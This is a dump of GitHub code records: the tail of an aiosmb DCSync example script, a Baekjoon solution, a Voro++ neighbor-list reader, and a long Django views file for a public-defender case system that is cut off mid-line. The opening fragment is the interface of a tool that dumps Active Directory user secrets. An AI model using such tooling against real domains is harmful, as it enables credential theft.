perform DCSync on.')\n\tparser.add_argument('--json', action='store_true', help='File output will be pritten in JSON format')\n\tparser.add_argument('-u', '--user', action='append', default = [], help='User name to get secrets for. If not used, all users will be polled. Can be stacked.')\n\t\n\targs = parser.parse_args()\t\n\t\n\tif args.verbose == 0:\n\t\tlogging.basicConfig(level=logging.INFO)\n\t\taiosmb.logger.setLevel(logging.WARNING)\n\t\t\n\telif args.verbose == 1:\n\t\tlogging.basicConfig(level=logging.DEBUG)\n\t\taiosmb.logger.setLevel(logging.INFO)\n\t\t\n\telse:\n\t\tlogging.basicConfig(level=1)\n\t\taiosmb.logger.setLevel(logging.DEBUG)\n\t\n\tasyncio.run(dcsync(args.connection_string, args.out_file, args.domain, args.user, json_out = args.json))\n\t","repo_name":"xBlackSwan/aiosmb","sub_path":"aiosmb/examples/old_dontuse/dcsync.py","file_name":"dcsync.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"519115554","text":"import sys\n\n\ndef main() -> None:\n input_num = int(sys.stdin.readline().rstrip())\n input_list = list(map(int, sys.stdin.readline().rstrip().split(sep=' ')))\n sum_num = int(sys.stdin.readline().rstrip())\n\n start_index, end_index = 0, input_num - 1\n output_num = 0\n\n input_list.sort()\n\n while start_index < end_index:\n if input_list[start_index] + input_list[end_index] == sum_num:\n output_num += 1\n start_index += 1\n end_index -= 1\n elif input_list[start_index] + input_list[end_index] > sum_num:\n end_index -= 1\n else:\n start_index += 1\n\n print(output_num)\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"junhyuk1229/baekjoon-python","sub_path":"Problem solutions/3273.py","file_name":"3273.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2896763579","text":"#!/usr/bin/python\n# coding = utf-8\n#This module is part of an analysis package\n\nAuthorinfo = \"\"\"\n ------------------Name: Yuan-Chao Hu--------------\n --------------Email: ychu0213@gmail.com-----------\n ----------Web: https://yuanchaohu.github.io/------\n \"\"\"\n\nDocstr = \"\"\"\n Reading partcles' Neighbor list and Voronoi polyhedron facearea \n from the output of Voro++ Package analysis\n\n Voronoi tessellation can be carried out use the provided script 'Voronoi.sh'\n Voropp() is suitable for both data\n\n \"\"\"\n\nimport numpy as np \n\ndef Voropp(f, ParticleNumber):\n \"\"\"\n Read Neighbor list data from the results of Voro++ Package\n &&&&&&&&&\n Read facearea list data from the results of Voro++ Package\n\n Read One Snapshot a time to save computer memory\n If you have multiple snapshots, you can import this function in a loop\n f = open(filename, 'f')\n The Voronoi analysis can be carried out use the provided shell secipt 'voronoi.sh'\n \"\"\"\n\n header = f.readline().split() #header\n results = np.zeros((ParticleNumber, 50))\n\n for n in range(ParticleNumber):\n item = f.readline().split()\n results[int(item[0]) - 1, 0] = float(item[1])\n results[int(item[0]) - 1, 1:(int(item[1]) + 1)] = [float(j) - 1 for j in item[2:(int(item[1]) + 2)]]\n #Be attention to the '-1' after '=', all particle id has been reduced by 1\n #Please becareful when you are reading other data, like face area\n #you should first transform the data back before computation in other codes\n\n if 'neighborlist' in header: #neighbor list should be integer\n results = results.astype(np.int)\n \n return results","repo_name":"yuanchaohu/analysiscodes","sub_path":"HuPackage.Version3/codes/ParticleNeighbors.py","file_name":"ParticleNeighbors.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"20687013956","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom __future__ import absolute_import, division, print_function, unicode_literals # isort:skip\r\n\r\n# Biblioteca Padrao\r\nimport calendar\r\nimport json as simplejson\r\nimport logging\r\nimport math\r\nimport mimetypes\r\nfrom datetime import date, datetime, time, timedelta\r\n\r\n# Bibliotecas de terceiros\r\nimport re\r\nimport reversion\r\n\r\nfrom constance import config\r\nfrom core.context_processors import permissao_acesso_propacs\r\nfrom dateutil.relativedelta import relativedelta\r\nfrom django.conf import settings\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth.decorators import login_required, permission_required\r\nfrom django.contrib.auth.models import User\r\nfrom django.core.cache import cache\r\nfrom django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist\r\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\r\nfrom django.db import connection, transaction\r\nfrom django.db.models import Count, Sum, Case, When, Value, IntegerField, F, Q, BooleanField, Prefetch, OuterRef, Subquery, Exists\r\nfrom django.http import Http404, HttpResponseRedirect, JsonResponse, FileResponse\r\nfrom django.shortcuts import redirect, render, get_object_or_404\r\nfrom django.urls import reverse\r\nfrom django.utils import timezone\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.decorators.cache import never_cache\r\nfrom django.views.generic import CreateView, ListView, TemplateView, View\r\nfrom djdocuments_solar_backend.backend import SolarDefensoriaBackend\r\nfrom djdocuments.models import Documento as DocumentoGED\r\nfrom djdocuments.views.documentos import VincularDocumentoBaseView, DocumentoCriar\r\nfrom rest_framework import mixins, permissions\r\nfrom rest_framework_extensions.mixins import DetailSerializerMixin\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.viewsets import GenericViewSet, ModelViewSet\r\n\r\n\r\n# Solar\r\nfrom assistido.models import PessoaAssistida as Pessoa, Documento as DocumentoAssistido\r\nfrom atendimento.atendimento.usecases import download_documentos\r\nfrom atendimento.atendimento.models import TipoVulnerabilidade, AtendimentoVulnerabilidade\r\nfrom atendimento.atendimento.permissions import PERMISSAO_PARA_ARQUIVAR, PERMISSAO_PARA_DESARQUIVAR\r\nfrom evento.models import Evento\r\nfrom contrib import constantes\r\nfrom contrib.models import Bairro, Comarca, Dados, Documento, Servidor, Util, Defensoria, Telefone\r\nfrom contrib.services import envia_sms\r\nfrom core.models import (\r\n Classe as CoreClasse,\r\n Documento as CoreDocumento,\r\n TipoDocumento as CoreTipoDocumento,\r\n TipoEvento as CoreTipoEvento\r\n)\r\nfrom defensor.models import Atuacao, Defensor\r\nfrom evento.models import Categoria\r\nfrom indeferimento.models import Indeferimento\r\nfrom luna_chatbot_client.tasks import (\r\n chatbot_notificar_requerente_atendimento,\r\n chatbot_notificar_requerente_documento,\r\n chatbot_notificar_requerente_exclusao,\r\n)\r\nfrom nucleo.nucleo.models import Formulario as FormularioNucleo\r\nfrom nucleo.nucleo.models import Resposta as RespostaNucleo\r\nfrom nucleo.nucleo.models import Nucleo\r\nfrom nucleo.nadep.models import Prisao, Atendimento as AtendimentoPreso\r\nfrom nucleo.nadep.services import Preso as ServicesPreso\r\nfrom procapi_client.services import APIAviso\r\nfrom processo.processo.forms import ProcessoForm, ProcessoParteForm\r\nfrom processo.processo.models import Manifestacao, ManifestacaoDocumento, Parte as ParteProcesso, Processo\r\nfrom processo.processo.models import Audiencia\r\nfrom relatorios.models import Local, Relatorio\r\n# Modulos locais\r\nfrom .forms import (\r\n AnotacaoForm,\r\n AtendimentoDefensorForm,\r\n AtividadeForm,\r\n AtividadeDefensorForm,\r\n BuscarAtendimentoDocumentosForm,\r\n BuscarAtendimentoForm,\r\n BuscarTarefaForm,\r\n DistribuirAtendimentoForm,\r\n DocumentoForm,\r\n TabDocumentoForm,\r\n DocumentoRespostaForm,\r\n AgendarDocumentoForm,\r\n NotificacaoForm,\r\n NucleoPedidoForm,\r\n NucleoRespostaForm,\r\n TarefaForm,\r\n CriarDocumentoOnlineParaAtendimentoForm,\r\n CriarDocumentoOnlineParaAtendimentoViaModeloPublicoForm,\r\n)\r\nfrom .models import (\r\n Acesso,\r\n Acordo,\r\n Arvore,\r\n Assunto,\r\n Atendimento,\r\n AtendimentoParticipante,\r\n AtendimentoVisualizacao,\r\n Coletivo,\r\n Documento as DocumentoAtendimento,\r\n Cronometro,\r\n Defensor as AtendimentoDefensor,\r\n Documento as AtendimentoDocumento,\r\n MotivoExclusao,\r\n Pessoa as AtendimentoPessoa,\r\n Tarefa,\r\n TarefaVisualizacao,\r\n FormaAtendimento,\r\n PastaDocumento)\r\nfrom .serializers import DocumentoAtendimentoSerializer, PastaDocumentoSerializer\r\nfrom .services import (\r\n AtendimentoService,\r\n ServiceDocumentoAtendimento,\r\n arquivamento_esta_habilitado,\r\n atualiza_tarefa_atendimento_origem,\r\n envia_sms_exclusao,\r\n envia_email_exclusao,\r\n preencher_campos_ged,\r\n filtra_tarefas,\r\n swap_ordenacao_tarefas,\r\n get_tarefas_propac,\r\n criar_documento_ged_para_o_atendimento,\r\n consulta_status_arquivado,\r\n checar_possibilidade_retorno\r\n)\r\nfrom .tasks import atendimento_cria_arvore\r\nfrom .view_mixins import SingleAtendimentoDefensorObjectMixin\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef atender(request, atendimento_numero):\r\n \"\"\"Utilizado para carregar a página Ficha de Atendimento\"\"\"\r\n\r\n servidor = request.user.servidor\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n else:\r\n defensor = None\r\n\r\n try:\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero, ativo=True)\r\n except Exception:\r\n messages.error(request, u'O atendimento {} não existe!'.format(\r\n atendimento_numero\r\n ))\r\n return redirect('atendimento_index')\r\n\r\n # Se foi remarcado, redireciona para novo atendimento\r\n if atendimento.remarcado:\r\n messages.warning(request, u'O atendimento foi remarcado, seu novo número é {}'.format(\r\n atendimento.remarcado.numero\r\n ))\r\n return redirect('atendimento_atender', atendimento.remarcado.numero)\r\n\r\n # Se tipo processo e tem inicial, redireciona para atendimenot inicial\r\n if atendimento.tipo == Atendimento.TIPO_PROCESSO and atendimento.inicial and atendimento.inicial.ativo:\r\n return redirect('atendimento_atender', atendimento.inicial.numero)\r\n\r\n hoje = date.today()\r\n dia_um = datetime(hoje.year, hoje.month, 1)\r\n pode_ver_historico_do_atendimento = (atendimento.pode_ver_atendimento(request.user) and\r\n atendimento.pode_ver_detalhes_do_atendimento(request.user) and\r\n verifica_permissao_editar(request.user, atendimento))\r\n\r\n # Registrar primeira vez que um usuário acessar a página de atendimento a cada dia (se não for superusuário)\r\n if config.REGISTRAR_VISUALIZACAO_ATENDIMENTO_SUPERUSUARIO or not request.user.is_superuser:\r\n\r\n visualizou_hoje = AtendimentoVisualizacao.objects.filter(\r\n atendimento=atendimento.at_inicial,\r\n visualizado_por=request.user,\r\n visualizado_em__gte=hoje\r\n ).exists()\r\n\r\n if not visualizou_hoje:\r\n AtendimentoVisualizacao.objects.create(\r\n atendimento=atendimento.at_inicial,\r\n evento=atendimento,\r\n visualizado_por=request.user\r\n )\r\n\r\n form = AtendimentoDefensorForm(instance=atendimento)\r\n form_processo = ProcessoForm()\r\n form_processo_parte = ProcessoParteForm(prefix='parte')\r\n\r\n tab = request.GET.get('tab', None) # seta a Tab ativa\r\n\r\n # altera qualificacao se solicitado para este atendimento e não realizado ou realizado no mês corrente\r\n if request.session.get('qualificacao_id') \\\r\n and atendimento.id == request.session.get('atendimento_id') \\\r\n and (request.user.has_perm('atendimento.requalificar_atendimento_retroativo') or (\r\n atendimento.data_atendimento is None or\r\n atendimento.data_atendimento >= dia_um)\r\n ):\r\n\r\n # recupera e aplica qualificacao da sessao\r\n atendimento.qualificacao_id = request.session['qualificacao_id']\r\n atendimento.save()\r\n\r\n # remove qualificacao da sessao\r\n request.session['qualificacao_id'] = None\r\n request.session['atendimento_id'] = None\r\n\r\n if request.session.get('nucleo'):\r\n ativo = request.session.get('nucleo') == atendimento.nucleo\r\n else:\r\n ativo = (atendimento.nucleo is None)\r\n\r\n prisoes = None\r\n preso = None\r\n\r\n if atendimento.requerente:\r\n prisoes = Prisao.objects.filter(pessoa=atendimento.requerente.pessoa, ativo=True).order_by('-data_prisao')\r\n preso = ServicesPreso(atendimento.requerente.pessoa)\r\n\r\n if prisoes:\r\n\r\n nadep = AtendimentoPreso.objects.filter(id=atendimento.id).first()\r\n\r\n if not atendimento.tipo == atendimento.TIPO_PROCESSO and not atendimento.realizado or atendimento.agendado_hoje:\r\n\r\n if request.GET.get('pessoa_id'):\r\n\r\n interessado = Pessoa.objects.filter(id=request.GET.get('pessoa_id')).first()\r\n\r\n if interessado:\r\n\r\n if not atendimento.pessoas.filter(pessoa=interessado).exists():\r\n atendimento.add_requerente(interessado.id)\r\n\r\n nadep = AtendimentoPreso()\r\n nadep.__dict__.update(atendimento.__dict__)\r\n nadep.interessado = interessado\r\n nadep.save()\r\n\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n permissao_editar = verifica_permissao_editar(request.user, atendimento)\r\n\r\n # Só gera um cronômetro para calcular tempo de atendimento se pessoa tem permissão para atender\r\n if permissao_editar:\r\n\r\n try:\r\n cronometro, msg = Cronometro.objects.get_or_create(\r\n atendimento=atendimento,\r\n servidor=servidor,\r\n finalizado=False\r\n )\r\n except MultipleObjectsReturned:\r\n cronometro = Cronometro.objects.filter(\r\n atendimento=atendimento,\r\n servidor=servidor,\r\n finalizado=False\r\n ).first()\r\n\r\n cronometro.atualizar()\r\n\r\n acesso_solicitado = atendimento.acesso_solicitado(defensor)\r\n acesso_concedido = atendimento.acesso_concedido(defensor)\r\n propacs_acesso = permissao_acesso_propacs(request)\r\n\r\n if defensor:\r\n\r\n # Atuacoes vigentes para o dia\r\n atuacoes = Atuacao.objects.vigentes_por_defensor(defensor=defensor)\r\n\r\n if request.session.get('nucleo'):\r\n atuacoes = atuacoes.filter(defensoria__nucleo=request.session.get('nucleo'))\r\n\r\n request.session['atendimento_id'] = atendimento.id\r\n\r\n relatorios_dados = Relatorio.objects.filter(\r\n papeis=request.user.servidor.papel,\r\n locais__pagina=Local.PAG_ATENDIMENTO_ATENDER\r\n ).ativos()\r\n\r\n relatorios_btn_requerente = Relatorio.objects.filter(\r\n papeis=request.user.servidor.papel,\r\n locais__pagina=Local.PAG_ATENDIMENTO_ATENDER_BTN_REQUERENTE\r\n ).ativos()\r\n\r\n relatorios_btn_requerido = Relatorio.objects.filter(\r\n papeis=request.user.servidor.papel,\r\n locais__pagina=Local.PAG_ATENDIMENTO_ATENDER_BTN_REQUERIDO\r\n ).ativos()\r\n\r\n angular_app = 'atenderApp'\r\n angular = 'AtendimentoCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/atender.html\", context=locals())\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef ocultar(request, atendimento_numero, defensoria):\r\n\r\n try:\r\n AtendimentoDefensor.objects.filter(\r\n numero=atendimento_numero,\r\n ativo=True\r\n ).update(\r\n exibir_no_painel_de_acompanhamento=False\r\n )\r\n except Exception:\r\n messages.error(request, u'Não foi possível ocultar o atendimento {}!'.format(\r\n atendimento_numero\r\n ))\r\n return redirect('atendimento_index')\r\n\r\n return redirect(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n defensoria_id=defensoria,\r\n painel='sem-peca-juridica'\r\n )\r\n\r\n\r\n@login_required\r\ndef atender_tab_atividades(request, atendimento_numero):\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n defensoria__nucleo__apoio_pode_registrar_atividades=True,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n # Atuações vigentes de defensores na defensoria do atendimento\r\n atuacoes = atendimento.defensoria.all_atuacoes.vigentes()\r\n participantes_exists = False\r\n permissao = False\r\n\r\n # Verifica se existem participantes de acordo com o tipo de núcleo\r\n if atendimento.defensoria.nucleo.multidisciplinar:\r\n participantes_exists = atendimento.participantes.exists()\r\n permissao = request.user.is_superuser or \\\r\n atendimento.participantes.filter(usuario=request.user).exists() or \\\r\n request.user.has_perm(perm='nucleo.admin_multidisciplinar')\r\n else:\r\n participantes_exists = atuacoes.exists()\r\n permissao = request.user.is_superuser or \\\r\n atuacoes.filter(defensor=request.user.servidor.defensor).exists()\r\n\r\n atendimento_realizado = atendimento.realizado\r\n\r\n hoje = datetime.now()\r\n diaMin = datetime(hoje.year, hoje.month, 1)\r\n diaMax = datetime(hoje.year, hoje.month, calendar.monthrange(hoje.year, hoje.month)[1])\r\n\r\n pedido = atendimento.origem\r\n\r\n atividades = atendimento.filhos.select_related(\r\n 'qualificacao'\r\n ).prefetch_related(\r\n 'documento_set',\r\n 'participantes_atendimentos'\r\n ).filter(\r\n origem=atendimento,\r\n ativo=True,\r\n tipo=Atendimento.TIPO_ATIVIDADE\r\n ).order_by(\r\n 'data_atendimento'\r\n )\r\n\r\n documentos = AtendimentoDocumento.objects.filter(\r\n atendimento__origem=atendimento,\r\n ativo=True\r\n ).order_by('documento_online__esta_assinado', 'nome')\r\n\r\n form = DocumentoForm()\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_atividades.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_documentos(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n ativo=True,\r\n remarcado=None\r\n )\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n else:\r\n defensor = None\r\n\r\n atendimento_para_upload = atendimento\r\n atendimento_permissao = False\r\n acesso_concedido = False\r\n pode_cadastrar_peticionamento = False\r\n pode_visualizar_aba = True\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n\r\n # Verifica se é um pedido de apoio (se possui filho TIPO_NUCLEO)\r\n atendimento_para_apoio = atendimento.filhos.filter(\r\n tipo=Atendimento.TIPO_NUCLEO,\r\n ativo=True\r\n ).exists()\r\n\r\n # Se é um pedido de apoio, procura por último atendimento válido (que não seja pedido de apoio)\r\n if atendimento_para_apoio:\r\n\r\n atendimento_para_upload = AtendimentoDefensor.objects.filter(\r\n (\r\n Q(id=atendimento.inicial_id) |\r\n Q(inicial=atendimento.inicial_id)\r\n ) &\r\n (\r\n (\r\n Q(tipo__in=[\r\n Atendimento.TIPO_INICIAL,\r\n Atendimento.TIPO_RETORNO,\r\n Atendimento.TIPO_INTERESSADO,\r\n Atendimento.TIPO_VISITA]) & ~\r\n Q(data_atendimento=None)\r\n ) |\r\n Q(tipo=Atendimento.TIPO_PROCESSO)\r\n ) &\r\n Q(ativo=True)\r\n ).exclude(\r\n filhos__tipo=Atendimento.TIPO_NUCLEO\r\n ).order_by(\r\n '-data_atendimento'\r\n ).first()\r\n\r\n if atendimento_para_upload is None:\r\n raise Http404\r\n\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n acesso_concedido = atendimento.acesso_concedido(defensor)\r\n\r\n try:\r\n if abas_atendimento_restritas[0] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n # Verifica se usário está lotado em alguma defensoria com o recurso peticionamento habilitado\r\n pode_cadastrar_peticionamento = defensor.atuacoes().vigentes().filter(\r\n defensoria__pode_cadastrar_peticionamento=True\r\n ).exists()\r\n\r\n pode_peticionar_documento_nao_ged = False\r\n if atendimento.defensoria.nucleo is not None:\r\n pode_peticionar_documento_nao_ged = atendimento.defensoria.nucleo.acordo\r\n\r\n form_documento = DocumentoForm()\r\n form_peticao_simples = TabDocumentoForm(request.GET, usuario=request.user)\r\n\r\n '''\r\n ATENÇÃO!!!\r\n Jamais use 'atendimento' no contexto para upload de arquivos, visto que a validação acima pode trocar o atendimento\r\n usado. Isso é necessário visto que o usuário pode estar com o pedido de apoio aberto, ocasionando o envio do\r\n documento para o setor solicitado, mas atendimento em questão ainda é necessário para outros tratamentos\r\n '''\r\n\r\n return render(\r\n request=request,\r\n template_name=\"atendimento/atender_tab_documentos.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'atendimento_para_upload': atendimento_para_upload,\r\n 'atendimento_permissao': atendimento_permissao,\r\n 'pode_visualizar_aba': pode_visualizar_aba,\r\n 'acesso_concedido': acesso_concedido,\r\n 'pode_cadastrar_peticionamento': pode_cadastrar_peticionamento,\r\n 'pode_peticionar_documento_nao_ged': pode_peticionar_documento_nao_ged,\r\n 'form_documento': form_documento,\r\n 'form_peticao_simples': form_peticao_simples,\r\n 'config': config\r\n }\r\n )\r\n\r\n\r\ndef download_documentos_anexos(request, atendimento_numero):\r\n requisicao_payload = simplejson.loads(request.body)\r\n\r\n prefixo_arquivo = requisicao_payload.get(\"prefixo_arquivo\", \"documentos_solicitados\")\r\n tipo_documentos = requisicao_payload.get(\"tipo_documentos\")\r\n arquivos_solicitados = requisicao_payload.get(\"arquivos_solicitados\")\r\n\r\n arquivo_path = download_documentos(arquivos_solicitados, prefixo_arquivo,\r\n atendimento_numero, tipo_documentos)\r\n\r\n return FileResponse(open(arquivo_path, \"rb\"), as_attachment=True)\r\n\r\n\r\n@login_required\r\ndef atender_tab_tarefas(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n defensor = None\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n acesso_concedido = atendimento.acesso_concedido(defensor)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n\r\n pode_visualizar_aba = True\r\n try:\r\n if abas_atendimento_restritas[1] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_tarefas.html\", context=locals())\r\n\r\n\r\ndef get_defensorias_usuario(usuario):\r\n\r\n defensorias = Defensoria.objects.none()\r\n\r\n if hasattr(usuario.servidor, 'defensor'):\r\n\r\n agora = datetime.now()\r\n\r\n # TODO: usar método Defensor.atuacoes_vigentes() c/ suporte aos eventos itnerantes\r\n defensorias = Defensoria.objects.filter(\r\n (\r\n (\r\n Q(all_atuacoes__defensor=usuario.servidor.defensor)\r\n ) &\r\n (\r\n (\r\n Q(all_atuacoes__data_inicial__lte=agora) &\r\n Q(all_atuacoes__data_final__gte=agora)\r\n ) |\r\n (\r\n Q(all_atuacoes__data_inicial__lte=agora) &\r\n Q(all_atuacoes__data_final=None)\r\n )\r\n ) & Q(all_atuacoes__ativo=True)\r\n ) |\r\n (\r\n Q(evento__participantes=usuario.servidor) &\r\n Q(evento__data_inicial__lte=agora) &\r\n Q(evento__data_final__gte=agora - timedelta(days=agora.day)) &\r\n Q(evento__ativo=True)\r\n )\r\n ).distinct()\r\n\r\n return defensorias\r\n\r\n\r\n# todo: mover para um local apropriado\r\ndef verifica_permissao_editar(usuario, atendimento):\r\n\r\n tem_permissao = False\r\n\r\n if usuario.is_superuser:\r\n tem_permissao = True\r\n else:\r\n tem_permissao = get_defensorias_usuario(usuario).filter(id=atendimento.defensoria_id).exists()\r\n\r\n return tem_permissao\r\n\r\n\r\n@login_required\r\ndef atender_tab_historico(request, atendimento_numero):\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n else:\r\n defensor = None\r\n\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero, ativo=True, remarcado=None).first()\r\n pode_efetuar_retorno = checar_possibilidade_retorno(atendimento)\r\n\r\n inicio = date.today()\r\n termino = datetime.combine(inicio, time.max)\r\n\r\n if atendimento:\r\n\r\n nadep = AtendimentoPreso.objects.filter(id=atendimento.id).first()\r\n\r\n if atendimento.requerente:\r\n prisoes = Prisao.objects.filter(pessoa=atendimento.requerente.pessoa, ativo=True).order_by('-data_prisao')\r\n preso = ServicesPreso(atendimento.requerente.pessoa)\r\n\r\n # verifição que qual data será usada como referência para realizar o atendimento (padrão: hoje)\r\n data_referencia = inicio\r\n\r\n # se já realizado, assume data do atendimento como data de referência\r\n if atendimento.data_atendimento:\r\n data_referencia = atendimento.data_atendimento\r\n # senão, se puder realizar retroativamente, assume data do agendamento como data de referência\r\n elif (\r\n atendimento.tipo != Atendimento.TIPO_NUCLEO and\r\n atendimento.data_agendamento is not None and\r\n atendimento.data_agendamento.date() < date.today() and\r\n atendimento.pode_atender_retroativo(request.user)\r\n ):\r\n data_referencia = atendimento.data_agendamento\r\n\r\n q = Q(ativo=True)\r\n q &= Q(atendimento=atendimento.at_inicial)\r\n q &= ~Q(documento_online=None)\r\n documentos = AtendimentoDocumento.objects.filter(q).order_by('-documento_online__esta_assinado', 'nome')\r\n\r\n form = AtendimentoDefensorForm(instance=atendimento)\r\n\r\n permissao_acessar = atendimento.permissao_acessar(usuario=request.user)\r\n permissao_editar = verifica_permissao_editar(request.user, atendimento)\r\n\r\n if defensor:\r\n\r\n acesso_solicitado = atendimento.acesso_solicitado(defensor)\r\n acesso_concedido = atendimento.acesso_concedido(defensor)\r\n form_nucleo = NucleoPedidoForm()\r\n\r\n defensorias = get_defensorias_usuario(request.user)\r\n defensorias_titular = defensorias.filter(\r\n Q(all_atuacoes__tipo__in=[Atuacao.TIPO_TITULARIDADE, Atuacao.TIPO_ACUMULACAO])\r\n )\r\n\r\n esta_lotado_classe_especial = defensorias.filter(grau=Defensoria.GRAU_2).exists()\r\n possui_processo_2grau = atendimento.at_inicial.get_processos().filter(\r\n parte__defensoria__grau=Defensoria.GRAU_2\r\n ).exists()\r\n\r\n razoes_indeferimento = CoreClasse.objects.processo_indeferimento().ativos()\r\n setores_encaminhamento_indeferimento = Defensoria.objects.ativos().filter(\r\n nucleo__indeferimento_pode_receber_negacao=True\r\n )\r\n\r\n pessoas = list(atendimento.get_requerentes().values_list('pessoa_id', flat=True))\r\n\r\n # Negativas de Atendimento dos requerentes em outros atendimentos\r\n indeferimentos_requerentes = Indeferimento.objects.annotate(\r\n recursos=Sum(\r\n Case(\r\n When(processo__eventos__tipo__tipo=CoreTipoEvento.TIPO_RECURSO, then=1),\r\n output_field=IntegerField()\r\n ))\r\n ).filter(\r\n Q(processo__desativado_em=None) &\r\n Q(processo__classe__tipo=CoreClasse.TIPO_NEGACAO_HIPOSSUFICIENCIA) &\r\n Q(processo__partes__pessoa__in=pessoas) &\r\n Q(\r\n Q(recursos=0) |\r\n Q(resultado=Indeferimento.RESULTADO_INDEFERIDO)\r\n ) &\r\n ~Q(atendimento=atendimento)\r\n )\r\n\r\n # Busca todos os Indeferimentos relativos a qualquer atendimento da árvore de atendimentos\r\n inicial_id = None\r\n atendimentos_id = []\r\n\r\n if atendimento.inicial:\r\n inicial_id = atendimento.inicial.id\r\n else:\r\n inicial_id = atendimento.id\r\n\r\n atendimentos_id = Atendimento.objects.filter(\r\n Q(ativo=True) &\r\n (\r\n Q(id=inicial_id) |\r\n Q(inicial__id=inicial_id)\r\n )\r\n ).values_list('id', flat=True)\r\n\r\n indeferimentos = Indeferimento.objects.ativos().filter(atendimento_id__in=atendimentos_id)\r\n\r\n mostrar_exibicao_acesso_atendimento = False\r\n\r\n if config.MODO_EXIBICAO_ACESSO_ATENDIMENTO == '1' and atendimento.tipo == Atendimento.TIPO_INICIAL: # inicial\r\n mostrar_exibicao_acesso_atendimento = True\r\n elif config.MODO_EXIBICAO_ACESSO_ATENDIMENTO == '2': # todos\r\n mostrar_exibicao_acesso_atendimento = True\r\n\r\n pode_atender_sem_liberar = request.user.has_perm('atendimento.atender_sem_liberar')\r\n pode_atender_retroativo = atendimento.pode_atender_retroativo(request.user)\r\n pode_ver_atendimento = atendimento.pode_ver_atendimento(request.user)\r\n pode_ver_detalhes_do_atendimento = atendimento.pode_ver_detalhes_do_atendimento(request.user)\r\n\r\n possui_permissao_remeter_atendimento = request.user.has_perm(perm='atendimento.remeter_atendimento')\r\n exibir_vulnerabilidade_digital = config.EXIBIR_VULNERABILIDADE_DIGITAL\r\n possui_permissao_arquivar_atendimento = request.user.has_perm(perm=PERMISSAO_PARA_ARQUIVAR)\r\n possui_permissao_desarquivar_atendimento = request.user.has_perm(perm=PERMISSAO_PARA_DESARQUIVAR)\r\n\r\n mostrar_campos_interesse_conciliar = True if settings.SIGLA_UF == 'rn' else False\r\n mostrar_botao_encerrar = True if settings.SIGLA_UF == 'am' else False\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_historico.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_outros(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n atendimento = atendimento.at_inicial # redireciona para atendimento inicial\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n acesso_concedido = atendimento.acesso_concedido(request.user.servidor.defensor)\r\n pode_visualizar_aba = True\r\n\r\n try:\r\n if abas_atendimento_restritas[3] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_outros.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_processos(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n bloqueado = False\r\n if not config.VINCULAR_PROCESSO_COM_ATENDIMENTO_EM_ANDAMENTO:\r\n bloqueado = atendimento.at_inicial.tipo != 